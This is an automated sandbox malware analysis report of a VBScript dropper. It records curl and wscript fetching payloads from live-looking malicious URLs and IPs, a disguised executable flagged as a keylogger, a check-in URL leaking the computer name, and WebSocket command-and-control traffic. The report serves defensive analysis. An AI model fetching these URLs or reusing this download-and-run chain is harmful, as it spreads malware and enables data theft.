Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49778
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49973

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wewewe.zip HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /contador/index.php?nomepc=user-PC HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	HTTP traffic detected: GET /672365339188b/6723653391970.vbs HTTP/1.1Host: endesa.clickUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wewewe.zip HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /contador/index.php?nomepc=user-PC HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.95.10.38Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: aaGv8t/cYOIYaK+ezrdpkg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: 0JzSPu5zfi7XAIhfH96wSg==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: tgb5255365e.servegame.com:2530Upgrade: websocketConnection: keep-alive, UpgradeSec-WebSocket-Key: NQjoum4smcb9bygYQEmS8Q==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org
Source: global traffic	HTTP traffic detected: GET /api/ip HTTP/1.1Connection: Keep-AliveUser-Agent: Embarcadero URI Client/1.0Host: worldtimeapi.org

Source: global traffic	DNS traffic detected: DNS query: endesa.click
Source: global traffic	DNS traffic detected: DNS query: worldtimeapi.org
Source: global traffic	DNS traffic detected: DNS query: tgb5255365e.servegame.com

Source: unknown

Source: wscript.exe, 0000000D.00000002.2188898352.000002397B800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188853081.0000023979D95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187817404.0000023979A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187575679.0000023979A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/contador/index.php?nomepc=
Source: wscript.exe	String found in binary or memory: http://64.95.10.38/contador/index.php?nomepc=user-PC
Source: wscript.exe, 0000000D.00000003.2187024924.0000023979A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/contador/index.php?nomepc=user-PC_Classes
Source: wscript.exe, wscript.exe, 00000009.00000003.2264836042.0000028C4246E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2261100241.0000028C4246E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187733558.0000023979A1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187024924.0000023979A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188898352.000002397B800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188853081.0000023979D95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187817404.0000023979A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187575679.0000023979A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/wewewe.zip
Source: wscript.exe, 0000000D.00000003.2187733558.0000023979A1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187024924.0000023979A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188760179.0000023979A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187575679.0000023979A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/wewewe.zip5EE
Source: wscript.exe, 0000000D.00000002.2188898352.000002397B800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/wewewe.zipj
Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000008AC0000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://70.34.247.142/UPLOADMAISL.phpU
Source: wscript.exe, 00000009.00000003.2317204708.0000028C4A9B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA.crl0q
Source: wscript.exe, 00000009.00000003.2317204708.0000028C4A9B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0&
Source: BLOCKBUSTER.exe, 0000000E.00000002.2567585344.00000000122FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://worldtimeapi.org/api/ip
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://worldtimeapi.org/api/ip=C:
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.embarcadero.com/products/delphi
Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002A86000.00000004.00001000.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.foolabs.com/xpdf
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.ghisler.com/plugins.htm
Source: BLOCKBUSTER.exe, 0000000E.00000002.2542791110.000000000A22F000.00000004.00001000.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000002.2393941031.000000000913A000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000008AC0000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
Source: wscript.exe, 00000009.00000003.2317204708.0000028C4A9B3000.00000004.00000020.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com.
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%d
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%dS
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.php
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/support.php
Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002B73000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade0
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradee/
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradeite
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/v3formats
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002B73000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.secureblackbox.com
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.totalcmd.net/directory/packer.html
Source: wscript.exe, 00000000.00000002.2266227962.00000220D3A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2266323721.00000220D5800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.cli
Source: wscript.exe, 00000000.00000002.2266227962.00000220D3A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.clic
Source: curl.exe, 00000004.00000002.2176558506.000001C44D390000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2175100622.000001C44D3C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.2176650798.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2175431467.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.2176558506.000001C44D398000.00000004.00000020.00020000.00000000.sdmp, 672365339196e.vbs	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbs
Source: curl.exe, 00000004.00000002.2176558506.000001C44D390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbsWinsta0
Source: curl.exe, 00000004.00000002.2176558506.000001C44D390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbscurl
Source: curl.exe, 00000004.00000003.2175100622.000001C44D3C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.2176650798.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2175431467.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbs~E

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 68.65.122.45:443 -> 192.168.2.6:49712 version: TLS 1.2

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: BLOCKBUSTER.exe PID: 4828, type: MEMORYSTR

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCDBB30: CreateFileW,DeviceIoControl,CloseHandle,

14_2_6FCDBB30

Detected potential crypto function

Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD4FF0	14_2_6FCD4FF0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE6750	14_2_6FCE6750
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD9650	14_2_6FCD9650
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE8D30	14_2_6FCE8D30
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE04C0	14_2_6FCE04C0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCDF480	14_2_6FCDF480
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD5400	14_2_6FCD5400
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE43C0	14_2_6FCE43C0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE83E0	14_2_6FCE83E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE0380	14_2_6FCE0380
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE03A4	14_2_6FCE03A4
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE0BA0	14_2_6FCE0BA0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD4BB0	14_2_6FCD4BB0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD4B20	14_2_6FCD4B20
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE0200	14_2_6FCE0200
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE8A20	14_2_6FCE8A20
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD11E0	14_2_6FCD11E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE78E0	14_2_6FCE78E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE98E0	14_2_6FCE98E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCED85C	14_2_6FCED85C
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD5850	14_2_6FCD5850
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCDE87E	14_2_6FCDE87E

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\hcx.dll 3976547348F3CD6887AD0BC6A1F1F54010B58CA5CC1A77A937E882DEF475AB9E
Source: Joe Sandbox View	Dropped File: C:\_672365339188b\BLOCKBUSTER.exe 1D822B3FAABB8F65FC30076D32A95757A2C369CCB64AE54572E9F562280AE845
Source: Joe Sandbox View	Dropped File: C:\_672365339188b\unrar.dll 2631FCDF920610557736549E27939B9C760743A2CDDEC0B2C2254CFA40003FB0

Found potential string decryption / allocating functions

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: String function: 6FCEDE20 appears 37 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: 672365339196e.vbs

Initial sample: Strings found which are bigger than 50

PE file contains executable resources (Code or Archives)

Source: 7zxa.dll.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: BLOCKBUSTER.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: Delphi compiled form '\031TVfsArchivePasswordDialog\030VfsArchivePasswordDialog\004Left\003\207\001\003Top\003\260\001\013BorderWidth\002\010\007Caption\006\016Enter Password\014ClientHeight\003\202'

Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002AE2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: .bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs
Source: BLOCKBUSTER.exe, 0000000E.00000002.2556013151.000000000B4EC000.00000004.00001000.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: <Mask Value=".bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs"/>
Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002AE2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (.bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@128/11@9/5

Source: C:\_672365339188b\BLOCKBUSTER.exe

14_2_6FCD8830

Source: C:\Windows\System32\curl.exe

File created: C:\Users\Public\6723653391970.vbs

Jump to behavior

Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_4828
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$46c$432c4c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$12dc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03

Source: C:\_672365339188b\BLOCKBUSTER.exe

File created: C:\Users\user\AppData\Local\Temp\BLOCKBUSTER.madExcept

Jump to behavior

Source: Yara match	File source: 14.0.BLOCKBUSTER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY

Source: C:\_672365339188b\BLOCKBUSTER.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs"

Source: C:\_672365339188b\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
